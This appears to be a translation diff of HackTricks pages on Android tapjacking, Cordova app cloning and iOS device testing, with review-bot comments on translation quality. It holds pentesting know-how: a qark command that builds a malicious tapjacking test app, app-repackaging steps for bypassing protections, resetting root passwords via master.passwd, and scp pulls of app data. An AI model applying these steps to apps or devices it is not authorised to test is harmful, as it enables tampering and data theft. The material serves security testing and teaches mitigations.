Ili kugundua programu zinazoweza kuathiriwa na shambulio hili unapaswa kutafuta **shughuli zilizotolewa** katika android manifest (kumbuka kwamba shughuli yenye intent-filter inasafirishwa kiotomatiki kwa default). Mara umepata shughuli zilizotolewa, **angalia kama zinahitaji ruhusa yoyote**. Hii ni kwa sababu **programu mbaya itahitaji ruhusa hiyo pia**.
### Kinga
### Protection
#### Android 12 (API 31,32) na zaidi
#### Android 12 (API 31,32) na juu
[**Kulingana na chanzo hiki**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** mashambulio ya tapjacking yanazuiliwa moja kwa moja na Android kutoka Android 12 (API 31 & 30) na zaidi. Kwa hivyo, hata kama programu inaweza kuwa na kasoro hutaweza **kuitumia**.
[**Kulingana na chanzo hiki**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** mashambulizi ya tapjacking yanazuia kiotomatiki na Android kuanzia Android 12 (API 31 & 30) na juu. Hivyo, hata kama programu ina udhaifu huwezi **kuweza kuitumia**.
#### `filterTouchesWhenObscured`
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`kweli`**, `View` haitapokea kugusa wakati dirisha la maoni linapofunikwa na dirisha lingine linaloonekana.
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`true`**, `View` haitapokea kugusa wakati dirisha la mtazamo linapofunikwa na dirisha lingine linaloonekana.
#### **`setFilterTouchesWhenObscured`**
Sifa **`setFilterTouchesWhenObscured`** ikiwekwa kuwa kweli inaweza pia kuzuia kutumia kasoro hii ikiwa toleo la Android ni la chini.\
Ikiwekwa kuwa **`kweli`**, kwa mfano, kitufe kinaweza **kulemazwa moja kwa moja ikiwa kimefunikwa**:
Sifa **`setFilterTouchesWhenObscured`** iliyowekwa kuwa kweli pia inaweza kuzuia matumizi ya udhaifu huu ikiwa toleo la Android ni la chini.\
Ikiwa imewekwa kuwa **`true`**, kwa mfano, kitufe kinaweza kuondolewa kiotomatiki **ikiwa kimefunikwa**:
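Review bot: the Android 12 paragraph says `Android 12 (API 31 & 30)` in both the removed and the replacement line, which contradicts its own heading `#### Android 12 (API 31,32)`; Android 12 is API 31 and Android 12L is API 32, so the body should read `API 31 & 32`. On the plus side, the replacement line for `android:filterTouchesWhenObscured` keeps the attribute value as `true` where the removed line had translated it to `kweli` inside code formatting, which a reader could have copied into a layout literally. The headings `## Basic Information`, `### Detection` and `### Protection` revert the removed Swahili headings to English, which is inconsistent with `#### Android 12 (API 31,32) na juu` directly below them.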
```xml
<Button android:text="Button"
android:id="@+id/button1"
@ -50,46 +51,47 @@ android:layout_height="wrap_content"
android:filterTouchesWhenObscured="true">
</Button>
```
## Utekaji
## Utekelezaji
### Tapjacking-ExportedActivity
**Programu ya hivi karibuni ya Android** inayotekeleza shambulio la Tapjacking (+ kuita kabla ya shughuli iliyotolewa ya programu iliyoshambuliwa) inaweza kupatikana hapa: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
Programu ya **Android ya hivi karibuni** inayofanya shambulio la Tapjacking (+ kuanzisha kabla ya shughuli iliyosafirishwa ya programu iliyoathiriwa) inaweza kupatikana katika: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
Fuata **maagizo ya README** ili kuitumia.
Fuata **maagizo ya README ili kuitumia**.
### FloatingWindowApp
Mradi wa mfano unaoendeleza **FloatingWindowApp**, ambao unaweza kutumika kuweka juu ya shughuli zingine kutekeleza shambulio la clickjacking, unaweza kupatikana hapa [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (kidogo umri, bahati njema kujenga apk).
Mradi wa mfano unaotekeleza **FloatingWindowApp**, ambayo inaweza kutumika kuweka juu ya shughuli nyingine ili kufanya shambulio la clickjacking, unaweza kupatikana katika [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (ni ya zamani kidogo, bahati njema katika kujenga apk).
### Qark
{% hint style="danger" %}
Inaonekana kama mradi huu sasa hauendelezwi tena na hii kazi haifanyi kazi ipasavyo tena
Inaonekana mradi huu sasa hauhifadhiwi na kazi hii haifanyi kazi vizuri tena
{% endhint %}
Unaweza kutumia [**qark**](https://github.com/linkedin/qark) na vigezo `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` ili kuunda programu yenye nia mbaya kufanya majaribio ya uwezekano wa mapungufu ya **Tapjacking**.
Unaweza kutumia [**qark**](https://github.com/linkedin/qark) na vigezo `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` ili kuunda programu mbaya ya kujaribu uwezekano wa **Tapjacking** udhaifu.\
Kupunguza hatari ni rahisi kwa sababu mwandishi wa programu anaweza kuchagua kutokupokea matukio ya kugusa wakati maoni yanafunikwa na mengine. Kutumia [Marejeleo ya Developer wa Android](https://developer.android.com/reference/android/view/View#security):
Kuzuia ni rahisi kwa sababu mtengenezaji anaweza kuchagua kutopokea matukio ya kugusa wakati mtazamo umefunikwa na mwingine. Kutumia [Marejeo ya Wataalamu wa Android](https://developer.android.com/reference/android/view/View#security):
> Mara kwa mara ni muhimu kwamba programu iweze kuthibitisha kwamba hatua inafanywa kwa idhini kamili ya mtumiaji, kama vile kutoa ombi la idhini, kufanya ununuzi au bonyeza tangazo. Kwa bahati mbaya, programu inayodhuru inaweza kujaribu kudanganya mtumiaji kufanya hatua hizi, bila kujua, kwa kuficha lengo la maoni. Kama tiba, mfumo hutoa mbinu ya kuchuja kugusa ambayo inaweza kutumika kuboresha usalama wa maoni yanayotoa ufikiaji wa kazi nyeti.
> Wakati mwingine ni muhimu kwa programu kuweza kuthibitisha kwamba kitendo kinafanywa kwa maarifa na idhini kamili ya mtumiaji, kama vile kutoa ombi la ruhusa, kufanya ununuzi au kubonyeza tangazo. Kwa bahati mbaya, programu mbaya inaweza kujaribu kumdanganya mtumiaji kufanya vitendo hivi, bila kujua, kwa kuficha kusudi lililokusudiwa la mtazamo. Kama suluhisho, mfumo unatoa mekanizma ya kuchuja kugusa ambayo inaweza kutumika kuboresha usalama wa mitazamo inayotoa ufikiaji wa kazi nyeti.
>
> Ili kuwezesha kuchuja kugusa, piga simu [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) au weka sifa ya mpangilio ya android:filterTouchesWhenObscured kuwa kweli. Ikiwa imeanzishwa, mfumo utatupa kugusa zinazopokelewa wakati wowote dirisha la maoni linapositishwa na dirisha lingine linaloonekana. Matokeo yake, maoni hayatapokea kugusa wakati wowote toast, dirisha au dirisha lingine linaonekana juu ya dirisha la maoni.
> Ili kuwezesha kuchuja kugusa, piga [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) au weka sifa ya mpangilio ya android:filterTouchesWhenObscured kuwa kweli. Wakati imewezeshwa, mfumo utatupa kugusa ambazo zinapokelewa kila wakati dirisha la mtazamo linapofunikwa na dirisha lingine linaloonekana. Kama matokeo, mtazamo hautapokea kugusa kila wakati toast, mazungumzo au dirisha lingine linapojitokeza juu ya dirisha la mtazamo.
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
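Review bot: the replacement qark line ends with a trailing `\`, which in this GitBook markdown turns the qark paragraph and the following mitigation sentence (`Kuzuia ni rahisi...`) into one paragraph with a hard line break; the removed line had no backslash, so drop it and keep the two paragraphs separate. In the same line, `--exploit-apk` is in backticks but `--sdk-path` is not (the removed line has the same inconsistency); format both flags alike. `Marejeo ya Wataalamu wa Android` renders "Android Developer Reference" as an experts' reference; `Marejeo ya Watengenezaji wa Android` keeps the meaning of the linked `developer.android.com` page.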

@ -1,77 +1,79 @@
# Programu za Cordova
# Cordova Apps
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kwa maelezo zaidi angalia [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. Hii ni muhtasari:
Apache Cordova inatambuliwa kwa kuwezesha maendeleo ya **programu za hibridi** kwa kutumia **JavaScript, HTML, na CSS**. Inaruhusu uundaji wa programu za Android na iOS; hata hivyo, hauna mfumo wa msingi wa kusaidia usalama wa chanzo cha programu. Tofauti na React Native, Cordova haikusanyi chanzo cha programu kwa chaguomsingi, ambayo inaweza kusababisha udhaifu wa kubadilisha nambari. Cordova hutumia WebView kuonyesha programu, ikifichua nambari ya HTML na JavaScript hata baada ya kusanywa kwenye faili za APK au IPA. Kwa upande mwingine, React Native hutumia JavaScript VM kutekeleza nambari ya JavaScript, ikitoa ulinzi bora wa chanzo cha nambari.
Apache Cordova inatambulika kwa kuwezesha maendeleo ya **maombi ya mchanganyiko** kwa kutumia **JavaScript, HTML, na CSS**. Inaruhusu uundaji wa maombi ya Android na iOS; hata hivyo, haina mekanizma ya msingi ya kulinda msimbo wa chanzo wa programu. Kinyume na React Native, Cordova haitengenezi msimbo wa chanzo kwa msingi, ambayo inaweza kusababisha udhaifu wa kubadilisha msimbo. Cordova inatumia WebView kuonyesha maombi, ikifunua msimbo wa HTML na JavaScript hata baada ya kutengenezwa kuwa faili za APK au IPA. React Native, kinyume chake, inatumia JavaScript VM kutekeleza msimbo wa JavaScript, ikitoa ulinzi bora wa msimbo wa chanzo.
### Kujenga Nakala ya Programu ya Cordova
### K cloning ya Programu ya Cordova
Kabla ya kujenga nakala ya programu ya Cordova, hakikisha kuwa NodeJS imefungwa pamoja na mahitaji mengine kama Android SDK, Java JDK, na Gradle. Nyaraka rasmi za Cordova [hutoa mwongozo kamili](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) kwa ufungaji huu.
Kabla ya cloning ya programu ya Cordova, hakikisha kuwa NodeJS imewekwa pamoja na mahitaji mengine kama Android SDK, Java JDK, na Gradle. [Nyaraka rasmi za Cordova](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) inatoa mwongozo kamili wa usakinishaji huu.
Fikiria programu ya mfano inayoitwa `Bank.apk` na jina la pakiti `com.android.bank`. Ili kupata chanzo cha programu, fungua faili ya `bank.apk` na nenda kwenye folda ya `bank/assets/www`. Folda hii ina chanzo kamili cha programu, pamoja na faili za HTML na JS. Mazingira ya programu yanaweza kupatikana kwenye faili ya `bank/res/xml/config.xml`.
Fikiria mfano wa programu inayoitwa `Bank.apk` yenye jina la kifurushi `com.android.bank`. Ili kufikia msimbo wa chanzo, fungua `bank.apk` na uelekee kwenye folda `bank/assets/www`. Folda hii ina msimbo kamili wa chanzo wa programu, ikiwa ni pamoja na faili za HTML na JS. Mipangilio ya programu inaweza kupatikana katika `bank/res/xml/config.xml`.
Kufanya nakala ya programu, fuata hatua hizi:
Ili cloning ya programu, fuata hatua hizi:
```bash
npm install -g cordova@latest
cordova create bank-new com.android.bank Bank
cd bank-new
```
Nakili maudhui ya `bank/assets/www` hadi `bank-new/www`, isipokuwa `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, na saraka ya `plugins/`.
Kopi taarifa za `bank/assets/www` hadi `bank-new/www`, ukiondoa `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, na saraka ya `plugins/`.
Taja jukwaa (Android au iOS) unapounda mradi mpya wa Cordova. Kwa kuchukua nakala ya programu ya Android, ongeza jukwaa la Android. Kumbuka kuwa toleo la jukwaa la Cordova na viwango vya API vya Android ni tofauti. Angalia [nyaraka](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) za Cordova kwa maelezo juu ya toleo la jukwaa na viwango vya API vya Android vinavyoungwa mkono.
Taja jukwaa (Android au iOS) unapounda mradi mpya wa Cordova. Kwa kunakili programu ya Android, ongeza jukwaa la Android. Kumbuka kwamba toleo za jukwaa la Cordova na viwango vya API vya Android ni tofauti. Angalia [nyaraka](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) za Cordova kwa maelezo kuhusu toleo za jukwaa na APIs za Android zinazoungwa mkono.
Ili kujua toleo sahihi la jukwaa la Cordova Android, angalia `PLATFORM_VERSION_BUILD_LABEL` katika faili ya `cordova.js` ya programu ya awali.
Ili kubaini toleo sahihi la jukwaa la Cordova Android, angalia `PLATFORM_VERSION_BUILD_LABEL` katika faili ya `cordova.js` ya programu ya asili.
Baada ya kuweka jukwaa, sanidi programu zinazohitajika. Faili ya `bank/assets/www/cordova_plugins.js` ya programu ya awali inaorodhesha programu zote na toleo zao. Sanidi kila programu kwa kujitegemea kama inavyoonyeshwa hapa chini:
Baada ya kuweka jukwaa, sakinisha plugins zinazohitajika. Faili ya `bank/assets/www/cordova_plugins.js` ya programu ya asili inataja plugins zote na toleo zao. Sakinisha kila plugin moja kwa moja kama inavyoonyeshwa hapa chini:
```bash
cd bank-new
cordova plugin add cordova-plugin-dialogs@2.0.1
```
Ikiwa programu-jalizi haipatikani kwenye npm, inaweza kupatikana kutoka GitHub:
Ikiwa plugin haipatikani kwenye npm, inaweza kupatikana kutoka GitHub:
```bash
cd bank-new
cordova plugin add https://github.com/moderna/cordova-plugin-cache.git
```
Hakikisha kuwa mahitaji yote yanakidhi kabla ya kuanza kuchapisha:
Hakikisha mahitaji yote ya awali yamekamilishwa kabla ya kukusanya:
```bash
cd bank-new
cordova requirements
```
Kutengeneza APK, tumia amri ifuatayo:
Ili kujenga APK, tumia amri ifuatayo:
```bash
cd bank-new
cordova build android — packageType=apk
```
Amri hii inazalisha APK na chaguo la kuhariri limezimishwa, ikirahisisha uhariri kupitia Google Chrome. Ni muhimu kusaini APK kabla ya kuiweka, hasa ikiwa programu ina mekanizm ya kugundua uharibifu wa nambari.
Hii amri inazalisha APK yenye chaguo la debug limewezeshwa, ikirahisisha ufuatiliaji kupitia Google Chrome. Ni muhimu kusaini APK kabla ya usakinishaji, hasa ikiwa programu ina mifumo ya kugundua udanganyifu wa msimbo.
### Zana ya Kiotomatiki
### Zana ya Utaftaji
Kwa wale wanaotafuta kiotomatiki mchakato wa kujirudia, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** ni zana iliyopendekezwa. Inafanya mchakato wa kujirudia wa programu za Android kuwa rahisi, ikisimplisha hatua zilizoelezwa hapo juu.
Kwa wale wanaotafuta kuharakisha mchakato wa kunakili, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** ni zana inayopendekezwa. Inarahisisha kunakili programu za Android, ikifanya hatua zilizoelezwa hapo juu kuwa rahisi.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
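Review bot: the build command in the unchanged context line `cordova build android — packageType=apk` contains an em dash where the CLI expects a double hyphen, so the option never reaches the build as written; the separator should be `--` so that `--packageType=apk` is passed through. On the translated lines, the new heading `### K cloning ya Programu ya Cordova` is a half-edited fragment (a stray "K" plus the untranslated "cloning"), and `Ili cloning ya programu, fuata hatua hizi:` has the same problem; the removed wording "Kujenga Nakala ya Programu ya Cordova" / "Kufanya nakala ya programu" read correctly. Likewise `### Zana ya Utaftaji` means "search tool", not "automated tool"; the removed "Zana ya Kiotomatiki" matches the English heading and the sentence under it, which talks about automating the cloning steps.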


@ -1,28 +1,29 @@
# Uchunguzi wa Msingi wa Ufundi wa iOS
# iOS Basic Testing Operations
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **Muhtasari wa Kutambua na Kupata Ufikiaji wa Kifaa cha iOS**
## **Muhtasari wa Utambuzi wa Kifaa cha iOS na Ufikiaji**
### **Kutambua UDID ya Kifaa cha iOS**
### **Kuutambua UDID wa Kifaa cha iOS**
Kutambua kifaa cha iOS kwa kipekee, hutumika mfuatano wa tarakimu 40 unaojulikana kama UDID. Kwenye macOS Catalina au mpya zaidi, hii inaweza kupatikana kwenye programu ya **Finder**, kwani iTunes haipo tena. Kifaa, mara kilipounganishwa kupitia USB na kuchaguliwa kwenye Finder, inaonyesha UDID yake pamoja na habari nyingine wakati maelezo chini ya jina lake yanapobonyezwa.
Ili kutambua kifaa cha iOS kwa kipekee, mfuatano wa tarakimu 40 unaojulikana kama UDID unatumika. Kwenye macOS Catalina au toleo jipya, hii inaweza kupatikana kwenye **app ya Finder**, kwani iTunes haipo tena. Kifaa, kinapounganishwa kupitia USB na kuchaguliwa kwenye Finder, kinaonyesha UDID yake pamoja na taarifa nyingine wakati maelezo chini ya jina lake yanapobofya.
Kwa toleo la macOS kabla ya Catalina, iTunes inawezesha ugunduzi wa UDID. Maelekezo ya kina yanaweza kupatikana [hapa](http://www.iclarified.com/52179/how-to-find-your-iphones-udid).
Kwa matoleo ya macOS kabla ya Catalina, iTunes inarahisisha kugundua UDID. Maelekezo ya kina yanaweza kupatikana [hapa](http://www.iclarified.com/52179/how-to-find-your-iphones-udid).
Zana za amri ya mstari hutoa njia mbadala za kupata UDID:
Zana za mstari wa amri zinatoa njia mbadala za kupata UDID:
* **Kutumia zana ya I/O Registry Explorer `ioreg`:**
```bash
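Review bot: two grammar slips in the new UDID paragraph: the heading `### **Kuutambua UDID wa Kifaa cha iOS**` should read "Kutambua UDID ya Kifaa cha iOS" (the removed line already had "Kutambua"), and in the sentence ending `wakati maelezo chini ya jina lake yanapobofya` the verb needs the passive form "yanapobofywa" (when the details are clicked). The rest of the hunk, including the macOS Catalina/Finder explanation and the `ioreg` bullet, reads fine.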
@ -41,99 +42,99 @@ $ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p
```bash
$ instruments -s devices
```
### **Kupata Kifaa cha Shell**
### **Kupata Ufikiaji wa Shell ya Kifaa**
**Upatikanaji wa SSH** umewezeshwa kwa kufunga **kifurushi cha OpenSSH** baada ya kufungua kifaa, kuruhusu uunganisho kupitia `ssh root@<anwani_ya_ip_ya_kifaa>`. Ni muhimu kubadilisha nywila za msingi (`alpine`) kwa watumiaji `root` na `mobile` ili kuhakikisha usalama wa kifaa.
**Ufikiaji wa SSH** umewezeshwa kwa kufunga **pakiti ya OpenSSH** baada ya jailbreak, kuruhusu muunganisho kupitia `ssh root@<device_ip_address>`. Ni muhimu kubadilisha nywila za msingi (`alpine`) kwa watumiaji `root` na `mobile` ili kulinda kifaa.
**SSH kupitia USB** inakuwa muhimu ikiwa hakuna Wi-Fi, kwa kutumia `iproxy` kuweka ramani ya bandari za kifaa kwa ajili ya uunganisho wa SSH. Hii inawezesha upatikanaji wa SSH kupitia USB kwa kutekeleza:
**SSH kupitia USB** inakuwa muhimu pindi Wi-Fi haitapatikana, kwa kutumia `iproxy` kuunganisha bandari za kifaa kwa muunganisho wa SSH. Mpangilio huu unaruhusu ufikiaji wa SSH kupitia USB kwa kukimbia:
```bash
$ iproxy 2222 22
$ ssh -p 2222 root@localhost
```
**Programu za kushughulikia kifaa kwenye kifaa**, kama vile NewTerm 2, hufanikisha mwingiliano wa moja kwa moja na kifaa, hasa ni muhimu kwa ajili ya kutatua matatizo. **Maboya ya SSH ya kugeuza** pia yanaweza kuanzishwa kwa ajili ya ufikiaji wa kijijini kutoka kwenye kompyuta ya mwenyeji.
**On-device shell applications**, kama NewTerm 2, hurahisisha mwingiliano wa moja kwa moja na kifaa, hasa ni muhimu kwa ajili ya kutatua matatizo. **Reverse SSH shells** pia zinaweza kuanzishwa kwa ufikiaji wa mbali kutoka kwa kompyuta mwenyeji.
### **Kurejesha Nywila Zilizosahaulika**
### **Kurekebisha Nywila Iliyosahaulika**
Ili kurejesha nywila iliyosahaulika kurudi kwenye chaguo-msingi (`alpine`), ni lazima kuhariri faili ya `/private/etc/master.passwd`. Hii inahusisha kubadilisha hash iliyopo na hash kwa ajili ya `alpine` karibu na maelezo ya mtumiaji wa `root` na `mobile`.
Ili kurekebisha nywila iliyosahaulika kurudi kwenye chaguo-msingi (`alpine`), kuhariri faili ya `/private/etc/master.passwd` ni muhimu. Hii inahusisha kubadilisha hash iliyopo na hash ya `alpine` karibu na entries za mtumiaji `root` na `mobile`.
## **Mbinu za Uhamishaji wa Data**
## **Mbinu za Uhamasishaji wa Data**
### **Uhamishaji wa Faili za Data za Programu**
### **Kuhamisha Faili za Data za Programu**
**Kuhifadhi na Kupata kwa Kutumia SSH na SCP:** Ni rahisi kuhifadhi saraka ya Data ya programu kwa kutumia `tar` na kisha kuhamisha kwa kutumia `scp`. Amri ifuatayo inahifadhi saraka ya saraka ya Data katika faili ya .tgz, ambayo kisha inavutwa kutoka kwenye kifaa:
**Archiving and Retrieval via SSH and SCP:** Ni rahisi kuhifadhi saraka ya Data ya programu kwa kutumia `tar` na kisha kuhamasisha kwa kutumia `scp`. Amri iliyo hapa chini inahifadhi saraka ya Data katika faili ya .tgz, ambayo kisha inavutwa kutoka kwa kifaa:
```bash
tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693
exit
scp -P 2222 root@localhost:/tmp/data.tgz .
```
### **Zana za Kiolesura cha Mtumiaji cha Picha**
### **Zana za Kiolesura cha Mtumiaji**
